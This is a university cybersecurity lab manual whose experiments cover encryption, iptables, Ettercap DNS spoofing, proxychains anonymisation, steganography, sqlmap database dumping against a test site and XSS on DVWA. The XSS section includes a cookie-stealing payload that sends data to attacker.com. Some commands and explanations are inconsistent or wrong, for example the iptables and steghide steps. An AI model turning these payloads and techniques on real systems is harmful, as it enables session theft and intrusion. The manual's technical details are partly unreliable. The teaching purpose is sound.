DEPARTMENT OF CSE(CYBER SECURITY)

ESSENTIALS OF CYBER SECURITY LAB MANUAL

Academic Year: 2024-2025

Data Science Branch III B. TECH II SEMESTER

Prepared by

P.SATHISH

Assistant Professor

AVN INSTITUTE OF ENGINEERING AND TECHNOLOGY

Affiliated o JNTUH, Patelguda,(V), Ibrahimpatnam(M)

R. R Dist, TS - 501505

1
VISION AND MISSION OF THE INSTITUTION
VISION

To become self-sustainable institution this is recognized for its new age

engineering through innovative teaching and learning culture, inculcating
research and entrepreneurial ecosystem, and sustainable social impact in
the community.

MISSION

 To offer undergraduate and post-graduate programs that is supported

through industry relevant curriculum and innovative teaching and
learning processes that would help students succeed in their professional
careers.
 To provide necessary support structures for students, this will
contribute to their personal and professional growth and enable them to
become leaders in their respective fields.
 To provide faculty and students with an ecosystem that fosters research
and development through strategic partnerships with government
organizations and collaboration with industries.
 To contribute to the development of the region by using our
technological expertise to work with nearby communities and support
them in their social and economic growth.

2
VISION AND MISSION OF DEPARTMENT

VISION

To be recognized as a department of excellence by stimulating a learning

environment in which students and faculty will thrive and grow to achieve
their professional, institutional and societal goals.

MISSION

 To provide high quality technical education to students that will enable

life-long learning and build expertise in advanced technologies in
Computer Science and Engineering.
 To promote research and development by providing opportunities to
solve complex engineering problems in collaboration with industry and
government agencies.
 To encourage professional development of students that will inculcate
ethical values and leadership skills while working with the community to
address societal issues.

3
 CYBER SECURITY ESSENTIALS LAB

B.TECH III YEAR II SEM

Course Objectives:

1. Understanding Cyber security Principles and Techniques

2.Application of Security Tools and Methods

Course Outcomes:

1. Practical Skills in Cyber security Tools and Techniques

2. Analytical and Problem-Solving Abilities

4
 INDEX

Lab Experiments

1. Implement and test simple symmetric encryption algorithms like AES and DES.

2. Implement RSA encryption to demonstrate the concept of public and private

keys.

3. Set up and configure a basic firewall using tools like iptables on Linux.

4. Demonstrate DNS spoofing and DNS cache poisoning attacks.

5. Set up a proxy server and demonstrate how attackers can use proxies to hide
their tracks.

6. Demonstrate basic antiforensics techniques like

i. Deleting logs ii. Using steganography tools.

7. Perform SQL injection on a test website and then implement measures to

prevent it.

8. Create a simple application vulnerable to buffer overflow and demonstrate how

to exploit it.

9. Implement an XSS attack on a test web application and demonstrate ways to

mitigate such attacks.

10. Analyze a simple computer virus in a controlled environment and discuss

detection and prevention strategies.

11. Investigate the functioning of a rootkit and demonstrate techniques to detect it.

12. Set up a basic IDS like Snort and test its effectiveness in detecting different
types of attacks.

5
 EXPERIMENT NO: 1

AIM:

Implement and test simple symmetric encryption algorithms like AES

and DES.

STEP 1: Install mcrypt

─(kali㉿kali)-[~/sathish]
└─$ sudo apt install mcrypt
[sudo] password for kali:
mcrypt is already the newest version (2.6.8-8).
The following packages were automatically installed and are no longer required:
libbfio1 libc++1-19 libc++abi1-19 libsuperlu6 libunwind-19
Use 'sudo apt autoremove' to remove them.

Summary:
Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 255

Step-2 To cheak the mcrypt install or not

(kali㉿kali)-[~/sathish]
└─$ mcrypt --list
cast-128 (16): cbc cfb ctr ecb ncfb nofb ofb
gost (32): cbc cfb ctr ecb ncfb nofb ofb
rijndael-128 (32): cbc cfb ctr ecb ncfb nofb ofb
twofish (32): cbc cfb ctr ecb ncfb nofb ofb
arcfour (256): stream
cast-256 (32): cbc cfb ctr ecb ncfb nofb ofb
loki97 (32): cbc cfb ctr ecb ncfb nofb ofb
rijndael-192 (32): cbc cfb ctr ecb ncfb nofb ofb
saferplus (32): cbc cfb ctr ecb ncfb nofb ofb
wake (32): stream
blowfish-compat (56): cbc cfb ctr ecb ncfb nofb ofb
des (8): cbc cfb ctr ecb ncfb nofb ofb
rijndael-256 (32): cbc cfb ctr ecb ncfb nofb ofb
serpent (32): cbc cfb ctr ecb ncfb nofb ofb
xtea (16): cbc cfb ctr ecb ncfb nofb ofb

6
blowfish (56): cbc cfb ctr ecb ncfb nofb ofb
enigma (13): stream
rc2 (128): cbc cfb ctr ecb ncfb nofb ofb
tripledes (24): cbc cfb ctr ecb ncfb nofb ofb

step-3 to create file and write text

kali㉿kali)-[~/sathish]
└─$ nano sample
(kali㉿kali)-[~/sathish]
└─$ cat sample
this is first experment in cyber security
┌──(kali㉿kali)-[~/sathish]
└─$ ls
byy.txt hello hello.txt hit.txt private.key public.key sample

step-4 to genarete encrypt the file

┌──(kali㉿kali)-[~/sathish]
└─$ mcrypt sample
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: kali
Enter passphrase: kali

File sample was encrypted.

─(kali㉿kali)-[~/sathish]
└─$ cat sample.nc
m@rijndael-128 cbcmcrypt-sha1�%▒�g���l�‫־‬
o����sha1v7f�q_ƾ'=�jxFP< �
dT��k�t�D"���▒�+��o&=�O�����l�^`������91
���E�V�u

Step-5 to remove the file

(kali㉿kali)-[~/sathish]
└─$ rm sample

┌──(kali㉿kali)-[~/sathish]

7
└─$ ls
byy.txt hello hello.txt hit.txt private.key public.key sample.nc

step-6 to genarete decrypt the file

(kali㉿kali)-[~/sathish]
└─$ mcrypt -d sample.nc
Enter passphrase: kali
File sample.nc was decrypted.

┌──(kali㉿kali)-[~/sathish]
└─$ ls
byy.txt hello.txt private.key sample
hello hit.txt public.key sample.nc

┌──(kali㉿kali)-[~/sathish]
└─$

┌──(kali㉿kali)-[~/sathish]
└─$ cat sample
this is first experment in cyber security

8
 EXPERIMENT NO: 2

Aim: Implement RSA encryption to demonstrate the concept of public and

private keys.

RSA encryption is a widely used cryptographic algorithm that relies on the use of a
public and private key pair to secure communications. To demonstrate the concept
of public and private keys using Kali Linux, we can go through the following
steps:

Step-by-Step Implementation of RSA Encryption

1. Install OpenSSL (If not installed)

OpenSSL is a toolkit that provides various cryptographic operations, including

RSA encryption and decryption. On Kali Linux, OpenSSL should be pre-installed,
but you can ensure it's installed by running the following command:

sudo apt update

sudo apt install openssl

9
4. Encrypt a Message with the Public Key

(kali㉿kali)-[~/sathish]

└─$ openssl rsautl -encrypt -pubin -inkey public.key -in hello.txt -out byy.txt

 -encrypt indicates you want to encrypt.

 -inkey public_key.pem specifies the public key to use.
 -pubin tells OpenSSL that the input key is a public key.
 -in message.txt is the file containing the message.
 -out encrypted_message.bin is the encrypted output file.

5. Decrypt the Message with the Private Key

To decrypt the message, use the private key. The command for decryption is:

10
┌──(kali㉿kali)-[~/sathish]

└─$ openssl rsautl -decrypt -inkey private.key -in byy.txt -out hit.txt

The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.

Enter pass phrase for private.key:

 -decrypt specifies decryption.

 -inkey private_key.pem tells OpenSSL to use the private key.
 -in encrypted_message.bin is the encrypted message.
 -out decrypted_message.txt will store the decrypted message.

After running the decryption command, the original message will be in the
decrypted_message.txt file.

6. Check the Decrypted Message

You can view the decrypted message by using the cat command:

┌──(kali㉿kali)-[~/sathish]

└─$ cat hit.txt

this is cyber security department

11
 EXPERIMENT NO: 3

Aim : Set up and configure a basic firewall using tools like iptables on Linux.

What Is Iptables?

Iptables is a firewall program for Linux. It will monitor traffic from and to your
server using tables. These tables contain sets of rules, called chains, that will
filter incoming and outgoing data packets.

How does iptables work?

When a packet matches a rule, it is given a target, which can be another chain
or one of these special values:

 ACCEPT – will allow the packet to pass through.

 DROP – will not let the packet pass through.
 RETURN – stops the packet from traversing through a chain and tell it to
go back to the previous chain.
In this iptables tutorial, we are going to work with one of the default tables,
called filter. It consists of three chains:

 INPUT – controls incoming packets to the server.

 FORWARD – filters incoming packets that will be forwarded somewhere
else.
 OUTPUT – filter packets that are going out from your server.

1. Install iptables
─(kali㉿kali)-[~/Desktop]
└─$ sudo apt install iptables
iptables is already the newest version (1.8.11-2).
The following packages were automatically installed and are no longer
required:

12
 libbfio1 libgles-dev libpaper1
libc++1-19 libgles1 libsuperlu6
libc++abi1-19 libglvnd-core-dev libunwind-19
libegl-dev libglvnd-dev openjdk-23-jre
libfmt9 libjxl0.9 openjdk-23-jre-headless
libgl1-mesa-dev libmbedcrypto7t64 python3-appdirs
Use 'sudo apt autoremove' to remove them.

Summary:
Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 20
2. Check the status of your current iptables configuration by running

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables --version
iptables v1.8.11 (nf_tables)

─(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Here, the -L option is used to list all the rules, and -v is for showing the
info in a more detailed format. Below is an example output:
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)

target prot opt source destination

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

You will now have the Linux iptables firewall installed. At this point, you will
notice that all chains are set to ACCEPT and have no rules. This is not secure
since any packet can come through without filtering.

3. Define chain rules

13
Defining a rule means appending it to the chain. To do this, you need to insert
the -A option (Append) right after the iptables command, like so:

sudo iptables -A
It will alert iptables that you are adding new rules to a chain. Then, you can
combine the command with other options, such as:
 -i (interface) — the network interface whose traffic you want to filter,
such as eth0, lo, ppp0, etc.
 -p (protocol) — the network protocol where your filtering process takes
place. It can be either tcp, udp, udplite, icmp, sctp, icmpv6, and so on.
Alternatively, you can type all to choose every protocol.
 -s (source) — the address from which traffic comes from. You can add a
hostname or IP address.
 –dport (destination port) — the destination port number of a protocol,
such as 22 (SSH), 443 (https), etc.
 -j (target) — the target name (ACCEPT, DROP, RETURN). You need
to insert this every time you make a new rule.
Enabling connections on HTTP, SSH, and SSL ports
 Next, we want http (port 80), https (port 443), connections to work as
usual. To do this, we need to specify the protocol (-p) and the
corresponding port (–dport). You can execute these commands one by
one:
(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -A OUTPUT -p tcp --dport 80 -j REJECT

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -A OUTPUT -p tcp --dport 443 -j REJECT

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)

target prot opt source destination

14
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:http
REJECT tcp -- anywhere anywhere tcp dpt:http reject-with
icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:https reject-with
icmp-port-unreachable

To save the rule

kali㉿kali)-[~/Desktop]
└─$ sudo iptables-save >iptables-rules.v1

┌──(kali㉿kali)-[~/Desktop]
└─$ ls
iptables-rules.v1 sample

Deleting rules
If you want to remove all rules and start with a clean slate, you can use the -
F option (flush):
sudo iptables –F

(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)

target prot opt source destination

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

EXPERIMENT NO: 4

Aim: .Demonstrate DNS spoofing and DNS cache poisoning attacks.

15
Overview

In this article, I will be walking you through a common method of implementing

DNS cache poisoning on a network. I’ll illustrate my process with screenshots,
commands, and explanations. You are welcome to follow along and gain hands-on
experience with DNS spoofing to further reinforce the knowledge that you already
have.

Practical Demonstration

1. Find the IP address of your attacker machine

Since I’m doing this on my LAN, I can use my private IPv4 address, which I
truncated from the ifconfig command for the purpose of this demonstration.

┌──(root㉿kali)-[/home/kali/sathish]
└─# ifconfig
172.172.1.110

Configuring Ettercap

Quick Theory

Ettercap is being used in this context to resolve DNS queries coming from the
victim machine. Ettercap will respond to the DNS query with the IP address of the
attacking machine (Kali) such that when the victim visits the target domain, they
will be redirected to the attacker's IP address instead of the real IP address
associated with the domain name.
root㉿kali)-[/home/kali/sathish]
└─# mousepad /etc/ettercap/etter.conf

16
The changes to make are shown in green in the screenshot below.

Explanation: I set the UID and GID to 0 so that Ettercap has adequate permissions
on the machine. In this case, UID and GID 0 are root permissions.

Editing etter.dns
(root㉿kali)-[/home/kali/sathish]
└─# mousepad /etc/ettercap/etter.dns

Create the landing page of your malicious website

Now, we’ll prepare the HTML file that the victim will encounter once the DNS has
been spoofed. Since I’m using an Apache webserver, I’ll place the file in the root
directory on my machine,
nano index.html
<title>No More Planting Trees</title>

<h1>website hack</h1>

17
Start Malicious Web Server

As stated previously, I’m using Apache, so I just started theapache2 service.

Run Ettercap

On my Kali machine, I navigate to Applications > 09 — Sniffing & Spoofing >

ettercap-graphical in order to open the ettercap GUI.
(root㉿kali)-[/home/kali/sathish]
└─# ettercap -G

In the upper-right hand corner, I click on the right button and stop it.

Targets > Select targets.

18
I have white theme right now, don’t judge

I then enter the IP address of the victim machine and default gateway and press
“OK”. The default gateway can also be found in the ifconfig/ipconfig command
output of the victim machine.

Click the Earth icon in the upper right-hand corner and select ARP poisoning.

19
The default setting is okay here.

Then, click the three dots in the corner again. Go to Plugins > Manage plugins.

20
Select dns_spoof by double-clicking it. You’ll know that you’ve applied the plugin
when the asterisk appears to the left of the plugin name.

8. Visit The Domain on the Victim Machine

21
 EXPERIMENT NO: 5

Aim:.Set up a proxy server and demonstrate how attackers can use proxies to
hide their tracks.

What is a ProxyChain?
Proxychains are essentially a combination of proxies that reroute a TCP
connection to any server using different protocols, such as HTTP, HTTPS,
SOCK4 & SOCKS5, making the connection secure and making it nearly
impossible for an observer to figure out what you are looking for up online
and where you are. Through a very secure chain of proxies, ProxyChains
serves as an intermediary between the source IP and the endpoint IP,
concealing your identity. Most people mistakenly believe that VPNs are
safer than ProxyChains, however, the reality is that DNS leaks are more
common in VPNs, making them less secure than ProxyChains.
How to configure Proxychain?
There are two methods for configuring proxy chains.
 Method 1: Making use of Automated Tools
 Method 2: Manual configuration

Method 1: Making Use of Automated Tools

In this case, we’ll be employing TorGhost.

It is an anonymization script that basically redirects all internet traffic
through the SOCKS5 Internet Protocol, which TOR uses, and DNS
requests are also redirected through the TOR network, preventing
DNSLeak.
Step 1: Navigate to the location where you want to install the tool (in this
case Downloads folder).
cd <folder name>

22
Step 2: Run the following command to install TorGhost:
git clone https://github.com/SusmithKrishnan/torghost

The command above will create a folder called torghost and install the tool
within it.

23
Step 3: After installing, navigate to the TorGhost folder that was created
in the preceding step.
cd torghost

Step 4: To view the folder’s contents, run the following command.

ls

Step 5: Execute the build script.

./build.sh

24
This will install the dependencies needed for the tool to function correctly.
Step 6: Execute the python file with the command.
python3 torghost.py

25
This will display the commands that can be used while running the file.
Step 7: To launch the tool, enter the following command.
python3 torghost.py -s

The system’s IP address will change in a few seconds. You can also verify
your new IP address by typing what’s my IP into Google.

Method 2: Manually Configuring Proxychains

Step 1: Navigate to the /etc folder.

cd /etc

Step 2: Enter the ls command to view the files.

ls

26
Step 3: Look for the file proxychains.conf or proxychains4.conf.

Step 4: Use gedit to edit it.

gedit proxychains.conf
OR

27
gedit proxychains4.conf

The file will be opened in gedit.

Step 5: Return to the file’s top.
It will resemble this.

Step 6: Uncomment the dynamic chain and comment out the strict chain
by removing and replacing the # sign.

28
 dynamic_chain – Will create a new chain of proxies whenever a new
connection is opened.
 strict_chain – Will only use the last chained proxy while opening every
new connection.
So, in this case, we make the dynamic chain the default setting.
Step 7: Now search the web for websites that provide proxies, in this
case, Geonode.com, and select the protocol you want to use; HTTP and
HTTPS were used for demonstration purposes, but SOCK5 or SOCKS 4
can also be used. Make as many proxies as you like.

29
Step 8: Scroll down to the bottom of the gedit file.

Step 9: Copy and paste the proxies in the format shown in the image.

Step 10: Save and close the file

Done! Your system has now been set up to use multiple proxies. The
proxies will be used, but to be safe, restart the system.

30
 EXPERIMENT NO: 6

Aim: Demonstrate basic antiforensics techniques like i. Deleting logs ii. Using
steganography tools.

How To Use Steghide And StegoSuite Steganography Tools In Kali Linux

Hiding information in plain sight can be crucial for privacy and security.
Steganography allows you to conceal messages within image and audio files. This
guide will teach beginners how to use two popular steganography tools in Kali
Linux - Steghide and StegoSuite. You'll learn how to hide and extract secret data
with these tools. Steganography is relevant today for securely transmitting
information over monitored networks. This guide aims to introduce newcomers to
this important privacy technique. With some simple steps, you can start using
steganography to communicate discreetly in Kali Linux.
What is Steghide ?
Steghide is a free steganography program that allows you to hide secret files inside
other files. Steganography means concealing information within something else.
Steghide works by embedding your hidden data within an audio, image, or video
file. To anyone else, this carrier file will look and sound normal. But it secretly
contains your encrypted message or file. The Steghide tool lets you easily embed
your hidden information and extract it again with a password. This provides a way
to securely transmit messages or sensitive data over public networks or any system
where privacy is needed.
With just a few commands, Steghide makes it easy for even beginners to start
using basic steganography techniques in Kali Linux. It's a useful tool for learning
about and applying this form of concealed communication.
What is StegoSuite ?
StegoSuite is another free steganography program included in Kali Linux. It offers
several steganography techniques in one toolkit. StegoSuite lets you hide
information within images and audio files, just like Steghide. But it also includes
additional steganography methods like hiding data in video files, OpenOffice
documents, HTML web pages, and PDF files. The goal of StegoSuite is to provide
an all-in-one steganography tool with many different hiding techniques. This gives
users more options to conceal messages or files. Like Steghide, StegoSuite aims to
securely embed secret data so it can't be detected by others. The carrier files look
harmless, but they secretly hold encrypted messages.
31
StegoSuite provides an easy-to-use interface and wizard for beginner users to start
applying steganography. With both Steghide and StegoSuite, Kali Linux is well-
equipped for basic steganography tasks.

How To Use Steghide And StegoSuite Steganography Tools In Kali Linux

Steghide : Installation & Usage

Steghide is a free and open source steganography program that allows you to hide
secret files or messages within audio, image, and video files. It works right from
the command line interface in Kali Linux. The key advantage of Steghide is that it
can embed data without reducing the quality or file size of the original carrier file.
This makes it difficult to detect that any hidden information has been added.
To use Steghide, you first need to install it in Kali Linux. You can do this easily by
typing the following command :
Command :
sudo apt-get install steghide
Output :

StegHide Tool
Installation

Steghide is controlled completely through the terminal command line interface in

Kali Linux. To start using it, simply open a terminal window and type :
Command :
steghide
Output :

32
 Steg
hide Usage Commands

Create a text file called " secret.txt " and add some simple secret message text to it.
Save it in your working directory. Also place the image file you want to use to hide
the data, like " gfg.jpg ", in the same folder. Open a terminal window and use the "
steghide embed " command to embed " secret.txt " into " gfg.jpg ".
Command :
steghide embed -ef Secret.txt -ef gfg.jpeg
Output :

Embedding
Completed

It will ask you to create a password. Choose a strong password and enter it. This
will be needed to extract the hidden data later. Steghide will embed "secret.txt"
inside "kevinmitnick.jpg" using the password encryption.

33
Now the image file contains the secret data entirely hidden within it. You can
safely share or store the image file like normal. When ready, use the following
below command with the password to retrieve the embedded " Secret.txt " file.
Command :
steghide extract -sf gfg.jpeg
cat Secret.txt
Output :

Data Extraction

You can also have Steghide show info about any files with embedded data. The
below command will verify if a file has hidden content inside it :
Command :
steghide info gfg.jpg
It will confirm that there is embedded data, and report the encryption algorithm
and hidden file size.
Output :

This will
confirm that there is embedded data

34
StegoSuite : Installation & Usage
StegoSuite is another free steganography tool included in Kali Linux. The main
difference from Steghide is that StegoSuite provides a graphical interface, making
it more user-friendly.
To install StegoSuite, open a terminal and type :
Command :
sudo apt-get install stegosuite
Output :

StegoSuite Tool
Installation

Once you have installed the StegoSuite package in Kali Linux, you can easily start
using the program. Now you just need to type the following command to Launch
the StegoSuite Tool.
Command :
stegosuite gui
Output :

StegoSuite GUI Interface

35
3. After that Click the " Browse Files " button and select the image you want to use
to hide the text.

Choo
se the Image File

4. After Selecting the Image file Enter the secret text Message or Just Drag and
Drop the " Secret.txt " file. Then Set the Password to Encrypt the Image file and
Click on Embed. Follow the Steps as Shown in the Below GIF file.

Drag and Drop the

Secret.txt Text file.

After that you will see this New file created on the Desktop name " gfg_embed.png
" this file include our hidden file in it.

36
 Encrypt
ed Image file

Now the image file contains the secret data entirely hidden within it You can safely
share or store the image file like normal. Whenever you want to see the Hidden
Text file just use " stegosuite gui " Command and Select the New File that created
onto our Desktop and Just type the Password and hit the Extract Button.

Extracted

37
 EXPERIMENT NO: 7

Aim: Perform SQL injection on a test website and then implement measures
to prevent it.

What is SQL Injection?

SQL Injection is a code injection technique where an attacker executes malicious

SQL queries that control a web application’s database. With the right set of
queries, a user can gain access to information stored in databases. SQLMAP tests
whether a ‘GET’ parameter is vulnerable to SQL Injection.

Where can you use SQLMAP?

If you observe a web url that is of the form

http://testphp.vulnweb.com/listproducts.php?cat=1, where the ‘GET’ parameter is
in bold, then the website may be vulnerable to this mode of SQL injection, and an
attacker may be able to gain access to information in the database. Furthermore,
SQLMAP works when it is php based.

Installing sqlmap

SQLMAP comes pre-installed with kali Linux, which is the preferred choice of
most penetration testers. However, you can install sqlmap on other debian based
linux systems using the command

sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities
for demonstration purposes:

http://testphp.vulnweb.com/listproducts.php?cat=1

As you can see, there is a GET request parameter (cat = 1) that can be changed by
the user by modifying the value of cat. So this website might be vulnerable to

38
SQL injection of this kind.
To test for this, we use SQLMAP. To look at the set of parameters that can be
passed, type in the terminal,

sqlmap -h

The parameters that we will use for the basic SQL Injection are shown in the
above picture. Along with these, we will also use the –dbs and -u parameter, the
usage of which has been explained in Step 1.
Using SQLMAP to test a website for SQL Injection vulnerability:

 Step 1: List information about the existing databases

So firstly, we have to enter the web url that we want to check along with the -u
parameter. We may also use the –tor parameter if we wish to test the website
using proxies. Now typically, we would want to test whether it is possible to
gain access to a database. So we use the –dbs option to do so. –dbs lists all the
available databases.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

39
 We get the following output showing us that there are two available databases.
Sometimes, the application will tell you that it has identified the database and
ask whether you want to test other database types. You can go ahead and type
‘Y’. Further, it may ask whether you want to test other parameters for
vulnerabilities, type ‘Y’ over here as we want to thoroughly test the web
application.

 We observe that there are two databases, accurate and information_schema

40
 Step 2: List information about Tables present in a particular Database
To try and access any of the databases, we have to slightly modify our
command. We now use -D to specify the name of the database that we wish to
access, and once we have access to the database, we would want to see
whether we can access the tables. For this, we use the –tables query. Let us
access the accurate database.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

-D acuart --tables

Tables

 In the above picture, we see that 8 tables have been retrieved. So now we
definitely know that the website is vulnerable.

 Step 3: List information about the columns of a particular table

If we want to view the columns of a particular table, we can use the following
command, in which we use -T to specify the table name, and –columns to
query the column names. We will try to access the table ‘artists’.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

41
-D acuart -T artists --columns

Columns

 Step 4: Dump the data from the columns

Similarly, we can access the information in a specific column by using the
following command, where -C can be used to specify multiple column name
separated by a comma, and the –dump query retrieves the data

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

-D acuart -T artists -C aname --dump

42
 From the above picture, we can see that we have accessed the data from the
database. Similarly, in such vulnerable websites, we can literally explore
through the databases to extract information

9.Implement an XSS attack on a test web application and demonstrate ways to

mitigate such attacks.
Cross-Site Scripting (XSS) Attack Lab Manual

Objective

 Understand how XSS attacks work.

 Perform XSS attacks on a test web application (DVWA).
 Learn how to mitigate XSS attacks.

Lab Setup

1. Tools Required

 Kali Linux (Attacker Machine)

 XAMPP or Docker (To host DVWA)
43
  DVWA (Damn Vulnerable Web Application) (Target Application)
 Web Browser (Firefox with Burp Suite Extension is recommended)

Step 1: Setting Up the Test Environment

1.1 Install DVWA on Kali Linux

Method 1: Using XAMPP

1. Install XAMPP:

sudo apt update

sudo apt install xampp

2. Start XAMPP:

sudo /opt/lampp/lampp start

3. Download DVWA:

cd /opt/lampp/htdocs/
git clone https://github.com/digininja/DVWA.git

4. Configure DVWA:
o Open config/config.inc.php in a text editor:

nano /opt/lampp/htdocs/DVWA/config/config.inc.php

o Update MySQL settings:

php
CopyEdit
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';

5. Start Apache and MySQL:

sudo /opt/lampp/lampp start

44
Method 2: Using Docker (Alternative)

bash
CopyEdit
docker run --rm -it -p 80:80 vulnerables/web-dvwa

6. Open DVWA in your browser:

URL: http://localhost/DVWA/setup.php
7. Click "Create / Reset Database"
8. Login with:
o Username: admin
o Password: password
9. Set Security Level to Low in the DVWA security settings.

Step 2: Performing XSS Attacks

2.1 Reflected XSS Attack

1. Navigate to the "XSS Reflected" section in DVWA.

2. In the input field, enter the following JavaScript payload:

html
CopyEdit
<script>alert('XSS Attack!');</script>

3. Click Submit.
4. If successful, an alert box should pop up.

💡 Explanation: The input is reflected in the response without validation, allowing

execution of JavaScript.

2.2 Stored XSS Attack

1. Go to the "XSS Stored" section in DVWA.

2. In the comment field, enter:

<script>document.write('<img src="http://attacker.com/steal?
cookie='+document.cookie+'">');</script>

3. Click Submit.

45
 4. If successful, the script gets stored in the database and executes for every
visitor, sending cookies to the attacker’s server.

💡 Explanation: The script is saved in the database and executed whenever a user
visits the page.

2.3 DOM-Based XSS Attack

1. Open the XSS DOM section in DVWA.

2. In the URL bar, append the following payload:

http://localhost/DVWA/vulnerabilities/xss_d/?
default=<script>alert('XSS')</script>

3. Press Enter.
4. If successful, an alert box will appear.

💡 Explanation: The malicious script is executed by manipulating the DOM.

Step 3: Mitigation Techniques

3.1 Input Validation & Sanitization

 Escape HTML special characters:

htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

 Use parameterized queries in SQL.

3.2 Content Security Policy (CSP)

 Add this to the HTTP headers:

Content-Security-Policy: default-src 'self';

3.3 Use HTTP-Only Cookies

 Prevent cookie theft with:

setcookie("session", "value", ["httponly" => true]);

46
 EXPERIMENT NO: 10

Aim:Analyze a simple computer virus in a controlled environment and

discuss detection and prevention strategies.
Lab Setup For Malware Analysis
A lab setup for malware analysis typically includes the following components:
1. Virtual Machines: Virtual machines are used to isolate the malware and prevent
it from causing harm to the host system.
2. Analysis Tools: Tools such as antivirus software, sandboxing tools, and
disassemblers are used to analyze the behavior of malware and understand its
functionality.
3. Networking: A virtual network is used to simulate a real-world environment,
allowing the malware to communicate with other systems and allowing the
analyst to observe its behavior.
4. Storage: A large storage device is used to store the malware samples and
analysis data.
5. Monitoring Tools: Monitoring tools such as network sniffers and process
monitors are used to track the behavior of malware and collect data for analysis.
6. Backup System: A backup system is used to ensure that the analysis
environment can be quickly restored if it becomes compromised or unstable.
7. Documentation: Documentation is important for keeping track of the analysis
process and for sharing information with others who may be involved in the
analysis.
It’s important to note that a malware analysis lab must be designed and managed
with security in mind. Access to the lab should be restricted, and all tools and
systems used in the lab should be kept up-to-date and regularly reviewed to ensure
that they are secure.
Threats are one of the most challenging areas in the field of Information security
and the lack of qualified personnel makes it even harder for companies to keep
their information and assets secure and cater to such a situation without incurring
much loss. Malware analysis is the process of determining the origin, potential
impact, and functionality of the given malware sample such as virus, trojan horse,
etc. In this article, we are not going to discuss the whereabouts of Malware or
Malware Analysis. Rather we will see How can you effectively set up a lab for
Malware Analysis. As one plan can not fit the need of all the organizations, we
need to take into mind a few alternatives and decide the best according to your
organization’s needs. We will be covering the following topics in this article:

47
 Why do we need Malware Analysis Lab?
 Brainstorming to build a Malware Analysis Lab.
 Steps for setting up a Malware Analysis Lab.
Let’s get started and discuss each of these topics in detail.

Why do we need Malware Analysis Lab?

Malware Analysis Lab can help you in any of the following ways:
 It will increase your analysis speed.
 A suitable environment will build a framework and identify TTP and IOC.
 A malware analysis lab will help you to get control of what gets in and out of
the network.
 It will decrease the risk of infection.

Brain storming to Build a Malware Analysis Lab

The first and the most important thing to do before setting up a lab is to figure out
the needs and the requirements for setting up a lab. It is very important to have
some dedicated systems with tools to control, analyze, and safeguard your
environment. Some of the questions that you need to be clear about, to have a clear
understanding of what you need in your lab. What tools you need?: There are a
lot of tools available in the market for each task associated with Malware Analysis.
But you need to try a bunch of these tools and determine which tools are best
suited for your need. What type of Operating Systems do you need?: There are a
variety of systems available out there like Windows, Linux, OS X, or even mobile
OS like Android, iOS, etc. It is advisable to get started with Windows and Linux
first and then you can get your hands on other operating systems. What do you
want to achieve?: You should have a clear understanding of your motive of
setting up the lab and be clear which what you want to achieve through the lab.

Steps for setting up Malware Analysis Lab

To set up the Malware Analysis Lab, follow the points mentioned below. 1.
Network: One of the most important and the first step in setting up a lab is to
define its network. Here are a few reasons why this step is important:
 You need to have information about your network to identify uncommon
patterns and uncommon connection attempts.
 You need to know about what is going in and what is going out of the network.

48
 You need to intercept traffic between your Analysis system and the Network.
 You need to isolate the analysis system from other computers.
Choose your favorite private network address spaces so you assign static IP
addresses to each one of your systems. The reason for this allotment is that when
you start collecting Network information and you will spend most of your time
trying to figure out which systems did that belong to if you don’t make a list.
You’re also going to need a dedicated machine to control your network traffic and
to act as a gateway for your lab. REMnux and Kali are two options that you can
consider for your gateway. 2. Virtualization: Virtualization software is required in
either of the following scenarios:
 When you don’t have a few spare machines, a switch, and a dedicated physical
space for this.
 You simply want to carry your Lab with you whenever you go.
There are few options for Virtualisation software like VMWare, Qemu, Virtual
Box (free), and if you don’t mind spending a few bucks then you can go for
VMWare Workstation. Virtualization software will allow you to host your entire
lab in a single machine and they provide another interesting feature i.e. snapshots.
Snapshots allow you to revert the state of your machines to a clean state, so you
can start an analysis over and over again. These are quite useful for keeping track
of your work on long analysis. If you are using Virtualization Software, how you
set up your virtual network is very important. You have three options for this:
 Bridged: Do not use Bridged mode, this can expose your network to threats,
and you don’t want to infect anybody else systems.
 NAT: This is the ideal choice. Disable DHCP so you can stick to your design.
 Host-Only: Host-Only will only communicate your virtual system with your
host machine, you don’t want this either.
3. Analysis Machines: If you are going to do Malware Analysis, then you will
need a variety of systems to run your samples, Execute your tools, and do Static
and Dynamic Analysis. You will have to follow the following simple steps to set
up each one of the systems that you choose.
 Install the Operating System and install the Security Updates.
 Install Virtual Machine Tools(optional).
 Install Analysis Tools and for Windows, you can check Flare VM tools to
automate some of this task.
 Set up Network Configuration.
 Save a Snapshot in a clear state.

49
These simple five steps will help you to get a checklist and set up the machines
you’ll need to move forward on your analysis. Operating systems can be selected
from the following list:
 Windows 10
 Windows 7
 Linux (Ubuntu Server 16.04)
 REMnux
 Kali Linux
 Metasploitable 2
 Metasploitable 3
 Virtual Machine with OS X
 Android
